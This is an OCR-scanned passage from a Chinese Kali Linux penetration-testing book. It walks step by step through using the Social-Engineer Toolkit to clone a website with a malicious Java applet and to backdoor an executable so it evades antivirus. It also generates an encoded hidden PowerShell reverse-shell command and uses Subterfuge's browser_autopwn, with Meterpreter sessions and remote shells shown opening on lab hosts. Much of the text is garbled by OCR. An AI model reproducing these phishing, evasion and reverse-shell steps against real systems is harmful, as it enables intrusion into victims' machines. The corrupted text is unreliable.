The Metasploit Browser Exploit method will utilize select Metasplo: 
The Credential Harvester method will utilize web cloning of a web- 
The TabNabbing method will wait for a user to move to a different ! 
The Web-Jacking Attack method was introduced by white sheep, emgen! 
The Multi-Attack method will add a combination of attacks through ! 

1) Java Applet Attack Method 

2) Metasploit Browser Exploit Method 

3) Credential Harvester Attack Method 

4) Tabnabbing Attack Method 

5) web Jacking Attack Method 

6) Multi-Attack Web Method 

7) Full Screen Attack Method 

99) Return to Main Menu 
set :webattack> 





俞 出 的 信息 显示 了 Web 攻 击 向 量 中 ， 可 使 用 的 攻击 方法 列表 。 
(4) 这 里 选择 Java applet 攻 击 方法 ， 输 入 编号 1。 将 显示 如 下 所 示 的 信息 : 


set :webattack>1 

The first method will allow SET to import a list of pre-defined wet 
applications that it can utilize within the attack. 

The second method will completely clone a website of your choosing 
and allow you to utilize the attack vectors within the completely 
Same web application you were attempting to clone. 

The third method allows you to import your own website, note that \ 
Should only have an index.html when using the import website 
functionality. 


1) Web Templates 

2) Site Cloner 

3) Custom Import 

99) Return to Webattack Menu 
set :webattack> 


a] = Eum 


输出 的 信息 显示 了 Java applet 攻 击 的 菜单 列表 。 一 般 情 况 下 ， 使 用 前 两 种 。 其 中 第 
一 种 (Web 模块 ) 是 社会 工程 学 创建 一 个 一 般 的 网 页 ; 第 二 种 (复制 网 站 ) 是 使 用 
已 存在 的 网 页 作为 一 个 模块 ， 来 攻击 网 页 。 


(5) 这 里 选择 复制 网 站 ， 输 入 编号 2。 将 显示 如 下 所 示 的 信息 : 





set:webattack>2 
[-] NAT/Port Forwarding can be used in the cases where your SET machine is 
[-] not externally exposed and may be a different IP address than your reverse listener. 
set» Are you using NAT/Port Forwarding [yes|no]: no 
# 是 天 使 用 NAT/Port 转发 
[-] Enter the IP address of your interface IP or if your using an external IP, what 
[-] will be used for the connection back and to house the web server (your interface address) 
set:webattack> IP address or hostname for the reverse connection: 192.168. 


6.103 # 设 置 攻击 主机 的 地 址 


Next we need to specify whether you will use your own self generated java applet, built in applet, 
or your own code signed java applet. In this section, you have all three options available. The first 
will create a self-signed certificate if you have the java jdk installed. The second option will use the 
one built into SET, and the third will allow you to import your own java applet OR code sign the 
one built into SET if you have a certificate. 

Select which option you want: 

1. Make my own self-signed certificate applet. 

2. Use the applet built into SET. 

3. | have my own code signing certificate or applet. 


Enter the number you want to use [1-3]: 2 # 选 择 Java applet 类 型 
[*] Okay! Using the one built into SET - be careful, self signed isn't accepted in newer versions of 
Java :( 


[-] SET supports both HTTP and HTTPS 

[-] Example: http://www.thisisafakesite.com 

set:webattack> Enter the url to clone:http://www.qq.com 六 入 置 复制 的 网 页 
[+] Cloning the website: http://www.qq.com 

[*] This could take a little bit... 

[*] Injecting Java Applet attack into the newly cloned website. 

[+] Filename obfuscation complete. Payload name is: vWzsHO 

[*] Malicious java applet website prepped for deployment 

What payload do you want to generate: 


Name: Description: 

1) Windows Shell Reverse TCP Spawn a command shell on victim 
and send back to attacker 

2) Windows Reverse TCP Meterpreter Spawn a meterpreter shell on 
victim and send back to attacker 

3) Windows Reverse TCP VNC DLL Spawn a VMC server on victim and 
send back to attacker 

4) Windows Bind Shell Execute payload and create an 
accepting port on remote system 

5) Windows Bind Shell X64 Windows x64 Command Shell, Bind 
TCP Inline 

8) Windows Shell Reverse TCP X64 Windows X64 Command Shell, 


Reverse TCP Inline 
7) Windows Meterpreter Reverse TCP X64 Connect back to the attacker 
(Windows x64), Meterpreter 


8) Windows Meterpreter All Ports Spawn a meterpreter shell and 
find a port home (every port) 
9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP 
using SSL and use Meterpreter 
10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP 
address and spawn Meterpreter 
11) SE Toolkit Interactive Shell Custom interactive reverse 
toolkit designed for SET 
12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with 
AES encryption support 
13) RATTE HTTP Tunneling Payload Security bypass payload that 
will tunnel all comms over HTTP 
14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter 
payload through shellcodeexec 
15) Pylnjector Shellcode Injection This will drop a meterpreter 


payload through Pylnjector 
16) MultiPyInjector Shellcode Injection This will drop multiple 
Metasploit payloads via memory 


477) i wade eae eee el Cee ae eel Bee Fi bm arx irs 
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executable 
set:payloads> 


以 上 输出 的 信息 显示 了 可 使 用 的 攻击 载 傈 。 


(6) 这 里 选择 Windows Reverse TCP MeterpreterJX #& 23187, 
连接 。 输 入 编号 2， 将 显示 如 下 所 示 的 信息 : 


建立 一 个 反 向 TCP 


setipayloads>? 
Select one of the below, 'backdoored executable’ is typically the best. However, 
most still get picked up by AV. You may need to do additional packing/crypting 
in order to get around basic AV detection. 

1) shikata_ga_nai 


2) No Encoding 

3) Multi-Encoder 

4) Backdoored Executable 
setencoding»4 # 选 择 额 外 的 包装 方式 
set:payloads> PORT of the listener [443]: # 设 置 监 听 的 端口 号 


[*] Generating x86-based powershell injection code for port: 22 

[*] Generating x86-based powershell injection code for port: 53 

[*] Generating x86-based powershell injection code for port: 443 

[*] Generating x86-based powershell injection code for port: 21 

[*] Generating x86-based powershell injection code for port: 25 

[*] Finished generating powershell injection bypass. 

[+] Encoded to bypass execution restriction policy... 

[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds... 

[+] Backdoor completed successfully. Payload is now hidden within a legit executable. 
[+] Apache appears to be running, moving files into Apache's home 


rite rit e d ce be c cie b d c beni s bs c b ri e disc c nb n c n c c d c 


Web Server Launched. Welcome to the SET Web Attack. 


rib e ri e d c b cl cie i d cl b ni c s bs n b n e c sc n b n c c n c c e c a 


[--] Tested on Windows, Linux, and OSA [一 ] 

[-] Apache web server is currently in use for performance. [--] 
[*] Moving payload into cloned website. 

[+] The site has been moved. SET Web Server is now listening.. 
[-] Launching MSF Listener... 

[-] This may take a few to load MSF... 


V /| TE W M 
^ 
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| ATE. Th. fA T] Il di IL 

VIL. FA VAW / V CI TA 
Easy phishing: Set up email templates, landing pages and listeners 
in Metasploit Pro — learn more on http:;//rapid7 .com/metasploit 

=| metasploit v4.9.3-2014070201 [core:4.9 api:1.0] | 
+ -- --=[ 1315 exploits - 716 auxiliary - 209 post ] 
+ = = 三 | 341 payloads - 35 encoders - 8 nops ] 
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 
[+] Processing /root/.set/meta config for ERB directives. 

resource (/root/.set'meta config)» use exploit/multilhandler 
resource (/root/.set/meta config)» set PAYLOAD windows/meterpreter/ 
reverse tcp 
PAYLOAD => windows/meterpreter/reverse tcp 
resource (/root/.set'meta config)» set LHOST 192.168.6.103 
LHOST => 182.168.6.103 
resource (/root/.set/meta config)» set EnableStageEncoding false 
EnableStageEncoding => false 
resource (/root/.set/meta config)» set ExitOnSession false 
ExitOnSession => false 
resource (/root/.set/meta config)» set LPORT 22 
LPORT => 22 
resource (/root/.set/meta config)» exploit -j 
[*] Exploit running as background job. 
resource (/root/.set/meta config)» use exploit/multilhandler 
resource (/root/.set/meta config)» set PAYLOAD windows/meterpreter/ 
reverse tcp 
PAYLOAD => windows/meterpreter/reverse tcp 
resource (/root/.set/meta config)» set LHOST 192.168.6.103 
LHOST => 192.168.6.103 
resource (/root/.set/meta config)» set EnableStageEncoding false 
EnableStageEncoding => false 
resource (/root/.set/meta config)» set ExitOnSession false 
ExitOnSession => false 
resource (/root/.set/meta config)» set LPORT 53 
LPORT => 53 
resource (/root/.set/meta config)» exploit -j 
[*] Exploit running as background job. 
resource (/root/.set/meta config)» use exploit/multilhandler 
resource (/root/.set/meta config)» set PAYLOAD windows/meterpreter/ 
reverse tcp 


Pa) ss a ee ee cmm Ee E GER ZR p TTE LT TR 


[*] SH PW et PA 在 

[*] Starting the payload handler... 

PAYLOAD => windows/meterpreter/reverse tcp 

resource (/root/.set/meta config)» set LHOST 192.168.6. 103 
LHOST => 192.168.6.103 

resource (/root/.set/meta config)» set EnableStageEncoding false 
EnableStageEncoding => false 

resource (/root/.set/meta config)» set ExitOnSession false 
ExitOnSession => false 

resource (/root/.set/meta config)» set LPORT 443 

LPORT => 443 

resource (/root/.seU/meta config)» exploit -j 

[*] Exploit running as background job. 

resource (/root/.set/meta config)» use exploit/multi/handler 
resource (/root/.set/meta config)» set PAYLOAD windows/meterpreter/ 
reverse tcp 

[*] Started reverse handler on 192.168.6.103:53 

PAYLOAD => windows/meterpreter/reverse tcp 

[*] Starting the payload handler... 

[*] Started reverse handler on 192.168.6.103:443 

resource (/root/.set/meta config)» set LHOST 192.168.6.103 

[*] Starting the payload handler... 

LHOST => 192.168.6.103 

resource (/root/.set/meta config)» set EnableStageEncoding false 
EnableStageEncoding => false 

resource (/root/.set/meta config)» set ExitOnSession false 
ExitOnSession => false 

resource (/root/.set/meta config)» set LPORT 21 

LPORT => 21 

resource (/root/.set/meta config)- exploit -j 

[*] Exploit running as background job. 

resource (/root/.set/meta config)» use exploit/multi/handler 
resource (/root/.set/meta config)» set PAYLOAD windows/meterpreter/ 
reverse tcp 

PAYLOAD => windows/meterpreter/reverse tcp 

resource (/root/.set/meta config)» set LHOST 192.168.6. 103 
LHOST => 192.168.6.103 

resource (/root/.set/meta_config)> set EnableStageEncoding false 
EnableStageEncoding => false 

resource (/root/.set/meta config)» set ExitOnSession false 
ExitOnSession => false 

resource (/root/.set/meta config)» set LPORT 25 

LPORT => 25 

resource (/root/.set/meta config)» exploit -j 

[*] Exploit running as background job. 

[*] Started reverse handler on 192.168.6.103:21 

[*] Starting the payload handler... 

msf exploit(handler) > 

[+] Started reverse handler on 192.168.6.103:25 

[*] Starting the payload handler... 


以 上 输出 的 信息 是 攻击 主机 的 相关 配置 。 这 时 候 ， 当 目标 主机 通过 浏览 器 访问 攻击 
主机 时 将 会 伏 攻 击 。 


(7) 此 时 在 目标 主机 上 访问 攻击 主机 ， 将 出 现 如 图 7.20 所 示 的 界面 。 
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AE: Verified Irusted and Secure (VERIFIED) 
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M: http://192. 168. 6. 103 


|] MER CERCR TTP 00 * 
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(8) 从 该 界面 可 以 看 到 有 一 








个 警告 对 话 框 ， 询 问 是 否 要 运行 该 程序 。 该 对 话 框 融 


是 Java applet 弹 出 的 。 从 名 称 中 可 以 看 到 ， 是 Verified Trusted and 


secure (VERIFIED) 。 
FB: 


本 


现在 单 击 “ 运 行 ?按钮 ， 攻 击 主 机 将 会 创建 多 个 远程 会 话 ， 如 


] Sending stage (769536 bytes) to 192.168.6.106 

] Meterpreter session 1 opened (192.168.6.103:443 -> 192.168.6.1( 
] Meterpreter session 2 opened (192.168.6.103:21 -> 192.168.6.10¢ 
] Meterpreter session 3 opened (192.168.6.103:22 -> 192.168.6.10¢ 
] Meterpreter session 4 opened (192.168.6.103:53 -> 192.168.6.10¢ 
f exploit(handler) > 


mi 





从 以 上 输出 的 信息 中 ， 可 以 看 到 创建 了 4 个 会 话 。 此 时 可 以 使 用 sessions 命 令 查 看 


创建 的 会 话 。 
(9) 查 看 会 话 。 执行 


Tán 


Sa RATA : 


msf exploit(handler) > sessions 
Active sessions 


Id Type Information Connection 


1 meterpreter x86/win32 WIN-RKPKOFBLG6C\Administrator @ WIN- RKPKOFBLG6C 
192.168.6.103:443 -> 192.168.6.106:50729 (192.168.6.106) 

2 meterpreter x86/win32 WIN-RKPKOFBLG6C\Administrator @ WIN-RKPKOFBLG6C 
192.168.6.103:21 -> 192.168.6.106:50728 (192.168.6.106) 

3 meterpreter x86/win32 WIN-RKPKOFBLG6C\Administrator @ WIN-RKPKOFBLG6C 
192.168.6.103:22 -> 192.168.6.106:50727 (192.168.6.106) 

4 meterpreter x86/win32 WIN-RKPKOFBLG6C\Administrator @ WIN-RKPKQFBLG6C 
192.168.6.103:53 -> 192.168.6.106:50730 (192.168.6.106) 


Mig e a a A 会 话 。 此 时 可 以 选 
择 和 启动 任何 一 个 会 话 ， 获 取 到 远程 主机 的 命令 行 Shell。 


(10) 启动 会 话 1， 并 获取 远程 主机 的 Shell。 执 行 命 伟 如 下 所 示 : 


msf exploit(handler) > sessions -i 1 
[*] Starting interaction with 1.. 
meterpreter > shell 
Process 5056 created. 
Channel 1 created. 
Microsoft Windows [版 本 6.1.7601] 

(c) 2009 Microsoft Corporation 
C:\Users\Administrator\Desktop> 


从 输出 的 信息 中 ， 可 以 看 到 成 功 的 获取 到 一 个 远程 Shell。 


7.4.3 PowerShell + [5] & 


在 社会 工程 学 中 ， 使 用 基于 Java 的 PowerShell 攻 击 向 量 是 非常 重要 的 。 如 果 目 标 主 
pagent pie 则 不 能 期 骗 它 访问 攻击 主机 社会 工程 学 的 页 面 ， 将 不 能 进行 攻 

。 所 以 需要 使 用 另 一 种 方法 实现 ， 束 是 向 目标 主机 发 送 病毒 文件 。 使 用 
Power Shel D2 P Hi PoverShel ie Dm 目标 。 当 
目标 运行 时 ， 束 可 以 获取 一 个 远程 连 授 。 本 小 节 将 介绍 PowerShell 攻 击 向 量 。 


【实例 7-3】 使 用 PowerShell 攻 击 向 量 创建 PowerShell 文 件 ， 并 将 该 文件 发 送 给 目 
标 主 机 。 上 有 具体 操作 步骤 如 下 所 示 。 


(1) 启动 社会 工程 学 。 执 行 全 分 如 下 所 示 : 


Select from the menu: 

1) Social-Engineering Attacks 

2) Fast-Track Penetration Testing 

3) Third Party Modules 

4) Update the Metasploit Framework 

5) Update the Social-Engineer Toolkit 
6) Update SET configuration 

7) Help, Credits, and About 
99) Exit the Social-Engineer Toolkit 


(2) 选择 任 会 工程 学 ， 输 入 编号 1， 如 下 所 示 : 


set> 1 

Select from the menu: 
1) Spear-Phishing Attack Vectors 
2) Website Attack Vectors 
3) Infectious Media Generator 
4) Create a Payload and Listener 
5) Mass Mailer Attack 
6) Arduino-Based Attack Vector 
7) SMS Spoofing Attack Vector 
8) Wireless Access Point Attack Vector 
9) QRCode Generator Attack Vector 
10) Powershell Attack Vectors 

11) Third Party Modules 

99) Return back to the main menu. 


(3) 选择 PowerShell 攻 击 同 量 ， 输 入 编号 10。 将 显示 如 下 所 示 的 信息 : 


set> 10 
The Powershell Attack Vector module allows you to create PowerShel. 
1) Powershell Alphanumeric Shellcode Injector 
2) Powershell Reverse Shell 
3) Powershell Bind Shell 
4) Powershell Dump SAM Database 
99) Return to Main Menu 
set:powershell> 


(4) 选择 PowerShell 子 母 代 码 注 人 ， 输 入 编号 1。 将 显示 如 下 所 示 的 信息 : 





set:powershell>1 
set> IP address for the payload listener: 192.168.6.103 

# 设 置 攻击 主机 的 地 址 
set:powershell> Enter the port for the reverse [443]: 


# 设 置 反 连接 的 端口 号 ， 这 里 使 用 默认 端口 号 


[+] Prepping the payload for delivery and injecting alphanumeric shellcode... 
[+] Generating x86-based powershell injection code... 
[+] Finished generating powershell injection bypass. 
[+] Encoded to bypass execution restriction policy... 
[] lf you want the powershell commands and attack, they are 
Iroot/.set/reports/powershell/ 
set» Do you want to start the listener now [yes/no]: : yes 
TE d dE s AT 

Unable to handle kernel NULL pointer dereference at virtual address Oxd34db33f 
EFLAGS: 00010046 
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 
esi: 803bf014 edi: 8023c755 ebp: 80237184 esp: 80237160 
ds: 0018 es: 0018 ss: 0018 
Process Swapper (Pid: 0, process nr: 0, stackpage-80377000) 
Stack: 90909090990909090990909090 

90909090990909090990909090 

90909090.90909090.90909090 

§0909090.90909090.90909090 

90909090.90909090,09090900 

90909090.90909090,09090900 

CCCCCCCCCCCCCCCCCCCCCCCCC 

CCCCCCCCCCCCCCCCCCCCCCOCCC 


CCCCCCCCCCCCCCCCCCCCOCCCCCC 
CCCCCCCCCCCCCCCCCCCCCCCCCC 


COCCCCCCCCCCCCCCCCCCCCCCCC 
CCCCCCCCCCCCCCCCCCCCCCCCCC 


FFHETETSHF-HEFSETHFTSEFESEPETSEFPSHFSETEHEFSHFSETETPVSFSBESZTN 


Code: 00 00 00 00 M3 T4 SP LO 1T FR 4M 3W OR K! V3 R5 IO N4 00 00 00 00 
Aiee, Killing Interrupt handler 
Kernel panic: Attempted to kill the idle task! 
In swapper task - not syncing 
Payload caught by AV? Fly under the radar with Dynamic Payloads in 
Metasploit Pro -- learn more on http://rapid?.com/metasploit 
=[ metasploit v4.9.3-2014070201 [core:4.9 api:1.0] ] 
+ -- -=| 1315 exploits - 716 auxiliary - 209 post ] 
+ -- --z[ 341 payloads - 35 encoders - 8 nops ] 
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp | 
[s] Processing /root/.set/reports/powershell/powershell.rc for ERB directives. 
resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler 


resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse tcp 


payload => windows/meterpreter/reverse tcp 

resource (/root/.set/reports/powershell/powershell.rc)}> set Iport 443 

Iport => 443 

resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0 
LHOST => 0.0.0.0 

resource (/root/.set/reports/powershell/powershell.rc)> exploit -j 

[+] Exploit running as background job. 

msf exploit(handler) > 

[*] Started reverse handler on 0.0.0.0:443 

[*] Starting the payload handler... 


exported 


to 


输出 的 信息 显示 了 攻击 主机 的 配置 信息 。 此 时 已 经 成 功 启动 了 攻击 载 傈 ， 等 符 目 标 
主机 的 连接 。 以 上 设置 完成 后 ， 将 会 在 /root/.set/reports/powershell/ 目 录 下 创建 了 
一 个 渗透 攻击 代码 文件 。 该 文件 是 一 个 文本 文件 ， 其 文件 名 为 


x86 powershell injection.txt, 


(5) thet BATA, SADENIA, SD RB: 


root@kali:~# cd /root/.set/reports/powershell/ 
root@kali:~/.set/reports/powershell# ls 

powershell.rc x86 powershell injection.txt 
root@kali:~/.set/reports/powershell# cat x86 powershell injection .! 
powershell -nop -windows hidden -noni -enc JAAXACAAPQAgACCAJABJACA/ 
AEQAbABSAEkAbQBwAG8AcgBOACgAIgBrAGUAcgBuAGUAbAAZADIALgBkAGwAbAAŁACI 


ao e] en 





以 上 信息 就 是 x86 powershell injection.txt 文 件 中 的 内 容 。 从 第 一 行 可 以 看 出 ， 该 
文件 是 运行 powershell 命 爷 。 如 果 目 标 主 机 运行 这 段 代 码 ， 将 会 与 Kali 主 机 打开 一 
个 远程 会 话 。 

(6) 此 时 ， 可 以 将 x86 powershell injection.txt 文 件 中 的 内 容 复 制 到 目标 主机 
(Windows 7) 的 DOS 下 ， 然 后 运行 。Kali 主 机 将 会 显示 如 下 所 示 的 信息 : 


[*] Sending stage (769536 bytes) to 192.168.6.106 
[*] Meterpreter session 1 opened (192.168.6.103:443 -> 192.168.6.1( 


leisgll u 





从 输出 的 信息 ， 可 以 看 到 成 功 打 开 了 一 个 Meterpreter 会 话 。 
(7) 和 启动 会 话 1， 并 打开 一 个 远程 Shell。 执 行 命令 如 下 所 示 : 


msf exploit(handler) > sessions -i 1 
[^] Starting interaction with 1... 
meterpreter » shell 
Process 636 created. 
Channel 1 created. 
Microsoft Windows [版 本 6.1.7601] 
(c) 2009 Microsoft Corporation 
C: NUsersNAdministrator» 


从 输出 的 信息 中 ， 可 以 看 到 成 功 的 获取 到 一 个 远程 Shell。 


e. ; 在 以 上 例子 中 ， 通 过 复制 粘贴 的 方式 将 PowerShell 文 本 文件 发 送 给 了 

目标 ， 并 执行 它 来 获取 远程 Shell。 但 是 实际 情况 下 ， 这 是 不 可 能 的 。 所 以 ， 需 要 将 
创建 的 PowerShell 文 本 文件 转换 成 可 执行 的 .exe 文 件 或 批 处 理 文件 .bat。 用 户 也 可 

以 使 用 前 面 章节 中 介绍 的 Veil 程 序 ， 直 接 创建 .bat 文 件 。 


7.4.4 目 动 化 中 间 人 攻击 工具 Subterfuge 


Subterfuge 是 一 球 用 Python 写 的 中 间 人 攻击 框 如 ， 它 集成 了 一 个 前 痛 界 面 ， 并 收集 
了 一 些 着 名 的 可 用 于 中 间 人 攻击 的 安全 工具 。 成 功 运行 Subterfuge 需 要 Django 和 
scapy 等 模块 。 在 Subterfuge 安 装 包 的 dependencies 目 录 下 ， 提 供 了 Subterfuge 所 
需 的 Python 模块 。 本 小 节 将 介绍 Subterfuge 工 具 的 安装 和 使 用 。 


【实例 7-4】 安 装 Subterfuge 工 具 。 具 体操 作 步 骤 如 下 所 示 。 


(1) 2llhttp://code.google.com/p/subterfuge/downloads/listh4 uh F 3x SubterfugesX 
件 包 ， 其 软件 包 名 为 subterfuge _packages .tar.gz。 


(2) 解压 缩 Subterfuge 软 件 忆 。 执 行 命 爷 如 下 所 示 : 


root@kali:~# tar zxvf subterfuge_packages.tar.gz 


(3) RRSubterfugesk FA. wT RAT : 


root@kali:~# cd subterfuge/ 
root@kali:~/subterfuge# python install.py 


执行 以 上 命令 后 将 显示 如 图 7.21 所 示 的 界面 。 


r- | - m | ] nmm pum m 
Subterfuge Installer -|O |x | 


Welcome to the Subterfuge Graphical i 9 : 




















Installation ©ptiong g4 vit. 


* Full Install With Depencencies Simple Install 


Install => S. 





E 7.21 安装 Subterfuge 界 面 


(4) 在 该 界面 选择 Full Install With Depencencies 选 项 ， 并 单 击 Install 按 钮 。 安 装 
完成 后 ， 将 显示 如 图 7.22 所 示 的 界面 。 


complete. Thank 
you for installing 


| '* Full Install With Depencencies simple Install 








Install => © 


图 7.22 安装 完 


(5) 从 该 界面 可 以 看 到 弹出 一 个 小 对 话 框 ， 显 示 Subterfuge 安 疙 完成 。 此 时 ， 单 
# Finish#2 £x gl n] LASE MARR. 


【实例 7-5】 使 用 Subterfuge 工 具 。 具 体操 作 步 骤 如 下 所 示 。 
(1) 和 启动 Suberfuge 工 具 。 执 行 命令 如 下 所 示 : 


root@kali:~# subterfuge 


HUTA Esp, FETU RPA : 


Subterfuge courtesy of rOOtOv3rrid3 & OsmOsiz 

Validating models... 

© errors found 

Django version 1.3.1, using settings 'subterfuge.settings' 
Development server is running at http://127.0.0.1:80/ 
Quit the server with CONTROL-C. 


(2) 打开 浏览 器 ， 并 输入 127.0.0.1:80 访 问 Subterfuge 的 主 界面 ， 如 图 7.23 所 示 。 


Subterfuge - Iceweasel 
File Edit View History Bookmarks Tools Help 
Dom Subterfuge | | 
127.0.0.1 "vei ~ Qa m 


加 Most Visited" Blorrensive Security "& Kali Linux ™ Kali Docs Kexpioit-D8 M Aircrack-ng 


S SUB TERE UGE Modules ~ Settings 。 start 


Source Username Password Date 

















7.23 Subterfuge 主 界面 


(3) 从 该 界面 可 以 看 到 显示 了 一 个 Modules 和 Settings 菜 单 ， 并 且 还 有 一 个 Start 按 
钮 。 


在 Subterfuge 界 面 的 Modules 菜 单 下 ， 可 以 选择 所 有 提供 的 不 同 模块 进行 攻击 。 使 
用 Settings 菜 单 ， 可 以 修改 Subterfuge 一 些 功 能 ， 并 且 和 启动 攻击 。 下 面 使 用 HTTP 
Code Injection 模 块 ， 实 现 浏览 器 攻击 。 


【实例 7-6】 演示 使 用 Subterfuge 的 HTTP Code Injection 模 块 攻击 浏览 器 。 具 体操 
作 步 又 如 下 所 示 。 


(1) 在 图 7.23 中 ， 单 击 Modules 菜 单 ， 将 显示 如 图 7.24 所 示 的 界面 。 
A Welcome to the Subterfuge Plugin Menu. This sectio 


d to control which plugins are running and customize yogi 
biete red Sil. vectors. (Note multiple plugins may be run simultaneo 








A 


— Plugin Settings | 








| 


| : 





Subterfuge Module Tunnel Block 
Builder 





Denial of Service HTTP Code 
Injection 





图 7.24 所 有 攻击 模块 
(2) 在 该 界面 选择 HTTP Code Injection 模 块 ， 将 显示 如 图 7.25 所 示 的 界面 。 


Subterfuge = loeweasel 
File Edt View History Bookmarks Tools Help 
Subterfuge | oye 
4 127.0.0.1 C - * id 


B Most Visited Iiloffensive Security & Kali Linux "& Kali Docs KlExploit-D8 W Aircrack-ng 







| F'Iugin Settings 
A Subterfuge's HTTP Code Injection Module allows a user to inje 
payloads directly into a target's browsing session. Payloads ci 
Credential be anything from simple javascript/HTML injections to browser 
exploits. You even wile you DWT injects. 
Running: F 


browser.autopwrn 一 











Vector 





Subterfuge Modula 
Builder 


Payload: IFrame injection 


Vs. 





Den:al of Service HTTP Code 
Injection 











Session Hijacking Evilgrade Update 
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a 


图 7.25 设置 HTTP Code Injection 模 块 


(3) 在 该 界面 设置 HTTP Code Injection 模 块 的 插件 信息 。 这 里 使 用 默认 设置 ， 并 
单 击 Apply 按 钮 ， 将 显示 如 图 7.26 所 示 的 界面 。 


sh 


Using MSF Directory: /pentest/metasploit-4.2,0/mst3/ 
Lreating Metasploit Reasource File... 
=) use server/browser_autopen 
=> 192,168.6,103 
* set uripath / 


URIPATH 


Server Port => set sruport 8080 
| 


File Created 


Building injection... 
Using Payload frameinjection 
Serving up Metasploit... 





7.26 加 载 Metasploit 框 架 


(4) 该 界面 是 Subterfuge 自 动 打开 的 一 个 Shell 窗 口 ， 将 开始 加 载 Metasploit 渗 透 攻 
击 模块 ， 如 图 7.27 所 示 。 











[| Local IP: http://192,168,6,105:5080/beuAel) 
\™| Server started, 
[=] Starting exploit multi/browser/firefox_svg_plugin with payload generic/she 
_réeverse_tcp 
[=] Using URL: http://0,0,0,0:8080/X7PXeLtHxAx 
[In| Local IP: http: 199 2,158, 3.6. 102:£ OBO/EYPEeLtHxe» 
LN Server started, 
\™] Starting exploit multi/browser/ java_atomicreferencearray with payload java‘m 
eterpreter/reverze. tcp 
Using URL: httpz//0,0,0,0: BOBO/rzuaukbuN 
Local IP: http://132,158,5,103:8080/rzuaukbuN 
Server started, 
Starting exploit multi/browser/java_jrel/_jmaxbean with payload java/‘meterpre 
ry Peverse_ tcp 
| Using URL: http:/7/0,0,.0,0:8050/ JONpI vhnnul 
Local IP: http://192,169.6,103:9080/JONpI vhnnuN 
| Server started, 
Starting exploit multi/browser/ java_jrel/_provider_skeleton with payload jav 
a/meterpreter/reverse tcp 
[=] Using URL: http: //0,0,0,0:8080/Al Irck 
[=] Local IP: http://192,168,6,.103:8080/9Al Irc 
LIB Server started, 
[Im] Starting è flan t multi/browser/ java_jrel/_reflection_types with payload java 
'meterpreter/ verse_tep 
| Using URL: ey ÀDUNUNINIEIZ CLIP AFLH 
Local [Ps http:/, 7192 ,168.6.103:8080/XrCH 
Server started, 
Starting exploit multi/browser/ java_rhino with payload java/meterpreter/reve 
B tcp 
[=] Usina URL: httpsAs ETE UI (UZ 
【本 Local nsn HZ 190" 1, 5.102: 8080/uK xMZ 


7.27 3238 BUS E 


(5) 从 该 界面 可 以 看 到 加 载 了 好 多 个 渗透 攻击 模块 ， 加 载 完 后 ， 
所 示 的 界面 。 





将 显示 如 图 7.28 





n= 


|*] Local IP: httpi//1932.168,.6,.105:0080/AqWhATKEVEF 
"| Server started, 
l] Starting handler for windows, 
Li starting handler for hep eli _reverse ges on tends bbbb 
“| Started reverse handler on 152,164,b,105% 4544 
| Starting the payload handler... 
| Starting handler for java/meterpreter/reverse tcp on port 7777 
| Started reverse handler on 192,168,6 1023+666 EB 
| Starting the payload handler... 
| Started reverse handler on 132,168.6. 
“| Starting the payload handler... 


| === Done, found exploit modules 


| i sing UEL - ht t pz, y Fin Ô, iN i M £ Bn 
Local IP? httpz//1832. 169.6. 103:B0B0/ 
| Server started, 


图 7.28 模块 加 载 完 成 





(6) 从 该 界面 可 以 看 到 有 一 条 Done,found 18 exploit modules E, KI 
Subterfuge 找 到 了 18 个 渗透 攻击 模块 。 当 某 个 用 户 连 接 Kali 时 ， 将 会 使 用 其 中 的 一 


个 模块 。 当 目标 主机 访问 Kali 上 的 Subterfuge 时 ， 将 会 目 动 启动 大 


BAYS XS s Fl 


目标 主机 的 浏览 器 上。 此 时 ，Kali 系 统 上 将 显示 如 图 7.29 所 示 的 界面 。 


192,158.5.113 

192.158,5,113 browser autopun - Handlina 
HEF ReUiAwOnpoLWNuned4M jpNUO FO j Y'uMDoZ 3d ' 

192.158,5,113 browser autopun - JavaScript Report: Microsoft 
A FE ini He 2H LS] ES LU 

132.158,5.1135 browser autopwn - Reporting: 1:05 name-z»"Hicrosoft 
EL 335 "AF", $05 sp»? SPO", tos_lang=)"zh-cn’. BE") 


a :ch x66" | 
132 ,158,5.113 browser autopun = Responding with 14 exploits 
132,158,5.113 


browser autopwn - Handlina '/' 
Fal» jomorb? 7c IFdpbaRvds 


Mindows:XP:5 


lindows" 


java_atomicreferencearray = Sending Java AtomicReferencefrr 
ay Type Vulnerability 


Violation 


132,158,5.113 


192. 
4 Type by 
192. 


192.158 


192. 


iB, 5,1135 
Li lat Lil 
9.6.113 
16.113 


“ARTE 


Java, atomIicre 


java_atomicreferer 


Vulnerability 


java_atomicreferer 


java_jrel?_jmxcbean 
java_jrel?_jmcbean 


java_jrel?_jacbear 


E RE: 一 Sending 
cearray = Generat 
= handling reque 


= handling reque 
- handling regue 


Java Atomi 
ed jat 


st for /gkg 


st for fOr ab 


t T dr i F 


rop (5507 byt 


cReterencehHrr 


(5507 byt 


5scliaf J 


ecllaf J/ 


st for “gkobscligf J 


Java-atomicrererer Java Atomicketerencehrr 


| cearray - Sending 
a4 [lupe Violation Vulnerabilitu 





图 7.29 访问 攻击 主机 


(7) 以 上 显示 的 信息 表示 目标 主机 192.168.6.113 访 问 了 攻击 主机 的 Subterfuge。 
此 时 可 以 查看 打开 的 会 话 ， 如 图 7.30 所 示 。 


Connection 


RRa-SBbDOKJMZBFSMSTest © RBR-SSbÜURJHZBFSU 


heterpreter x8b/wins2 


#4555 => 1927,160.6.115:1169 {192.168.6.115) 
meterpreter xB85/wins2 AA-SS6OKIMZEFSW\ Test @ AR-BS60K JMZ6F SW 
> 192,168,5,113:1171 (192,.168.6,113) 

meter preter 


(86/win32 





nsf auxiliary ( browser_autopem) > 


47.30 打开 的 会 话 


(8) 从 该 界面 可 以 看 到 ， 成 功 的 打开 了 三 个 会 话 。 现 在 可 以 启动 任何 一 个 会 话 ， 
